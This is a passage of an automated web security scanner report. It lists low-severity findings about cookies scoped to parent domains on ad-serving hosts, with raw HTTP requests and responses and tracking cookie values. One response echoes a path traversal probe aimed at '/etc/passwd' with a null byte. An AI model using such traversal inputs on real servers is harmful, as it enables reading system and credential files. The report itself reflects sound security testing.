The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /action/doq.htm?pcode=utf-8&r=1316238723239.1 HTTP/1.1
Host: rt1901.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 6869
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

twnum=160&page%5Fkeyw=hollywood%20news%2Cred%20carpet%20fashion%2Ccelebrity%20hairstyles%2Ccelebrity%20beauty%20buzz%2Ccelebrity%20gossip%2Cacademy%20awards%2Coscars%2Ccelebrity%20makeup%2Ccelebrity%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:04:46 GMT; Path=/
Set-Cookie: cnoi=1; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:04:46 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1599
Date: Sat, 17 Sep 2011 00:50:39 GMT
Connection: close

data=({rid:'7fbf5229-56c4-45d9-9756-4d0d190b0283',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'reproduction':{auth:{ssd:'DKSkmBitGooNJ0g9jHlLv4GT0FIHNem2X3fUj7h7iiq3FrZzs4h8vskByE2Jz6KPrF2u
...[SNIP]...

11.126. http://rt1903.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1903.infolinks.com
Path:   /action/doq.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /action/doq.htm?pcode=utf-8&r=1316239125575.1 HTTP/1.1
Host: rt1903.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 9173
Origin: http://www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=4

pdesc=%20justin%20timberlake%20wants%20to%20make%20it%20clear%2Cthe%20explicit%20picture%20on%20mila%20kunis%2Ccell%20phone%2Cshowing%20a%20penis%2Cis%20not%20j%2Ct%2Cthis%20according%20to%20a%E2%80%A
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid="8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec"; Version=1; Domain=infolinks.com; Max-Age=2147483647; Expires=Thu, 05-Oct-2079 04:15:48 GMT; Path=/
Set-Cookie: cnoi=33; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:15:48 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 2020
Date: Sat, 17 Sep 2011 01:01:40 GMT
Connection: close

data=({rid:'52e80464-4fd8-49bb-8883-b8102d9272e9',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'cell phone':{auth:{ss
...[SNIP]...

11.127. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sensor4.js?GID=15493;CRE=;PLA=;ADI=; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c; G15493=C1S99917-2-0-0-0-1315313090-0; G14853=C1S98373-1-0-0-0-1315398787-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:45 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G15493=C1S99917-3-0-0-0-1315313090-907675; path=/; domain=.suitesmart.com; expires=Thu, 15-Mar-2012 00:52:45 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Sat, 17 Sep 2011 00:52:45 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...

11.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=661&prevkadIds=22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A7%3A44&ranreq=0.5183736386243254&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=54474395&rk1=24255064&rk2=1316239663.519&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:18 GMT
Content-Length: 1376
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:18 GMT; path=/
Set-Cookie: pubfreq_27331_22455_2121869150=325-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:18 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

11.129. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22454&kadwidth=300&kadheight=250&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A41&ranreq=0.6655045398510993&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:; USCC=ONE

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:14 GMT
Content-Length: 1862
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:14 GMT; path=/
Set-Cookie: pubfreq_27331_22454_1396765360=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:14 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:06:14 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.130. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A23&ranreq=0.44946281472221017&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=48939657&rk1=13158778&rk2=1316239703.749&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:57 GMT
Content-Length: 1568
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:57 GMT; path=/
Set-Cookie: pubfreq_27331_23101_1445244293=661-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:57 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA9WgAAAAAAAAAA
...[SNIP]...

11.131. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22454&kadwidth=300&kadheight=250&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A46&ranreq=0.014046431286260486&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414207&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=76094761&rk1=21428777&rk2=1316239726.597&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:20 GMT
Content-Length: 1176
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:20 GMT; path=/
Set-Cookie: pubfreq_27331_22454_1804611076=776-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:20 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC2VwAAAAAAAAAA
...[SNIP]...

11.132. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kadNetwork=661&prevkadIds=23101&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A4%3A17&ranreq=0.724578152410686&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=50772453&rk1=49226856&rk2=1316239456.221&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:02:51 GMT
Content-Length: 1572
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:02:51 GMT; path=/
Set-Cookie: pubfreq_27331_23101_1118422103=1058-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:42:51 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA9WgAAAAAAAAAA
...[SNIP]...

11.133. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A22&ranreq=0.05175817455165088&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:56 GMT
Content-Length: 1477
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:56 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1153720359=794-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:56 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA/WgAAAAAAAAAA
...[SNIP]...

11.134. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22454&kadwidth=300&kadheight=250&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A36&ranreq=0.6313232632819563&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414207&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=91119514&rk1=18936363&rk2=1316239536.352&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:10 GMT
Content-Length: 1179
Connection: close
